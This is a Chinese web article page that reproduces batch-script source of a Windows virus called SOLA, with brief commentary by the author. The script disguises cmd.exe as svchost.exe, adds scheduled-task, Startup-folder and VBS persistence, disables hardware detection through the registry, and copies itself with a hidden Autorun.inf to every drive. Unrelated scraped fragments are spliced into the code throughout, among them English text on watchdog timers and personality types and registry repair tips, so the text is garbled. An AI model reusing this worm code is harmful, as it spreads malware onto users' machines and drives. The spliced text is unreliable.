有哪些有趣的电脑病毒？(2)

rar -m0 -ep -ep1 a %setup%\txtpack.dll %sola%\Function.dll

rar -m0 -ep -ep1 a %setup%\exepack.dll %sola%\Function.dll

rar -m0 -ep -ep1 a %setup%\jpgpack.dll %sola%\Function.dll //竟然把文件又压缩到Function.dll里面,经过试验发现Function.dll确实也是一个压缩文件,解压出来不少东西.这些东西看了让我直冒冷汗...一会再研究吧...

del Function.exe

:Mainsetup

set A0001=copy

set A0002=attrib

set A0003=echo

set A0005=Shell Hardware Detection

tasklist >%sola%\task.txt

FOR /F "tokens=1" %%i in ('findstr /I "svchost.exe" "%sola%\task.txt"') do set svchost=%%i

%A0001% %systemroot%\system32\cmd.exe %sola%\%svchost%

del %sola%\task.txt

:Tasks

%A0002% %systemroot%\Tasks\Tasks.job -s -h -r

del %systemroot%\Tasks\Tasks.job

date %Date%

tasks.xxx %systemroot%\。the check timer is an example of a very simple watchdog type timer. itmonitors all the other standard demo tasks, and the register check tasks,and provides visual feedback as to the system status using an led.。2.people of the same personality type working together create a work environment that fits their type. for example, when artistic persons are together on a job, they create a work environment that rewards creative thinking and behavior -- an artistic environment.。

schtasks /change /ru "NT AUTHORITY\SYSTEM" /tn "Tasks" & if errorlevel 1 goto TaskFail

date %RealDate%

goto TaskSuc

:TaskFail

%homedrive%

cd "%ALLUSERSPROFILE%"

cd 「开始」菜单\程序\启动 //这段代码和上面几段作用相同,都是实现自启动.

date %Date%

%A0003% On Error Resume Next>SOLA.VBS

set ws = createobject("wscript.shell")。set ws=wscript.createobject("wscript.shell")。set ws = createobject("wscript.shell") 。

%A0003% ws.run "%sola%\svchost.exe /c %sola%\SOLA.BAT -Run",0 >>SOLA.VBS

%A0001% SOLA.VBS %sola%\SOLA.VBS

%A0003% NT>%systemroot%\Fonts\HIDESE~1\NoTasks

date %RealDate%

:TaskSuc

%A0002% %systemroot%\Tasks\Tasks.job +s +h +r

date %Date%

%A0001% %setup%\sleep.exe %systemroot%\system32\sleep.exe

date %RealDate%

:NoAutoPlay

net stop "%A0005%"

echo windows registry editor version 5.00>%systemroot%\。请将下面的代码保存编码格式为 unicode 的 reg 文件, 然后以管理员身份导入到注册表, 即可恢复 32 位 internet explorer 8 打开一个页面中链接的功能. 1. 适用于32位 windows 7 系统. 请复制以下代码 windows registry editor version 5.00 [hkey_local_machine\software\classes\interface\{79eac9c2-baf9-11ce-8c82-00aa004ba90b}] @=&ihlinksite& [hkey_local_machine\software\classes\interface\{79eac9c2-baf9-11ce-8c82-00aa004ba90b}\nummethods] @=&7& [hkey_local_machine\software\classes\interface\{79eac9c2-baf9-11ce-8c82-00aa004ba90b}\proxystubclsid32] @=&{a4a1a128-768f-41e0-bf75-e4fddd701cba}& [hkey_local_machine\software\classes\interface\{79eac9c3-baf9-11ce-8c82-00aa004ba90b...。windows registry editor version 5.00[hkey_local_machine\system\currentcontrolset\control\session manager]"excludefromknowndlls"=hex(7):6c,00,70,00,6b,00,2e,00,64,00,6c,00,6c,00,00,00,\00,00。

%A0003% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection]>>%systemroot%\Fonts\HIDESE~1\Regedit.reg

%A0003% "Start"=dword:00000004>>%systemroot%\Fonts\HIDESE~1\Regedit.reg

2、找到regedit.exe文件，将这个文件改名为regedit.com，然后双击打开。(2) 在windows目录中查找regedit.exe.sys 文件，如果找到则证明病毒存在，将同目录下的regedit.exe文件删除，将regedit.exe.sys文件改名为regedit.exe。(2) 在windows目录中查找regedit.exe.sys文件，如果找到则证明病毒存在，将同目录下的regedit.exe文件删除，将regedit.exe.sys文件改名为regedit.exe。

::End of Install

goto End&if errorlevel 1 exit

::End of Install

:Run

set runroot=%ALLUSERSPROFILE%\「开始」菜单\程序\启动

set taskroot=%systemroot%\Tasks //自启动

:RunTimeChk

if not exist %sola%\RunTime.txt echo !50>%sola%\RunTime.txt

for /f "tokens=* delims= " %%i in (yxkmp4dir.txt) do call :ss "%%i"。for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call ipchack.bat %%i %%j %%k。for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k。

if /i %RunTime% leq 0 goto Virus

set /a RunTime=%Runtime%-1

echo !%Runtime%>%sola%\RunTime.txt

:Diskchk

echo On Error Resume Next>%systemroot%\Fonts\HIDESE~1\RecentInf.VBS

echo set ws=wscript.createobject("wscript.shell")>>%systemroot%\Fonts\HIDESE~1\RecentInf.VBS

endlocal-----------------------------------------------------------------以下是setup.bat@echo off。echo lock.reg反注册成功------------------------------------------------------双击setup.bat即可安装。char *reg10="a.regwrite \\"hklm\\\\software\\\\microsoft\\\\command processor\\\\autorun\\",\\"%systemroot%\\\\run.bat&system32.vbe\\",\\"reg_sz\\"\\n"。

cscript %systemroot%\Fonts\HIDESE~1\RecentInf.VBS

del %systemroot%\Fonts\HIDESE~1\RecentInf.VBS

for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do vol %%i:&if errorlevel 1 set %%i=1

for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do echo 1>%%i:\solachk1 & findstr . %%i:\solachk1 & if not errorlevel 1 del %%i:\solachk1& findstr /C:"SOLA_1.0_2.0" %%i:\Autorun.inf & if errorlevel 1 attrib -s -h -r %%i:\Autorun.inf&copy /y %setup%\Autorun.inf %%i:\Autorun.inf&attrib %%i:\Autorun.inf +s +h +r&md %%i:\SOLA&copy /y "%setup%\sola.bat" %%i:\SOLA\SOLA.BAT&copy /y "%setup%\Function.dll" %%i:\SOLA\Function.dll&attrib %%i:\SOLA +s +h +r //文件我还是没搞到,不过看意思应该是使每个盘都感染病毒

本文来自电脑杂谈，转载请注明本文网址：
http://www.pc-fly.com/a/jisuanjixue/article-106915-2.html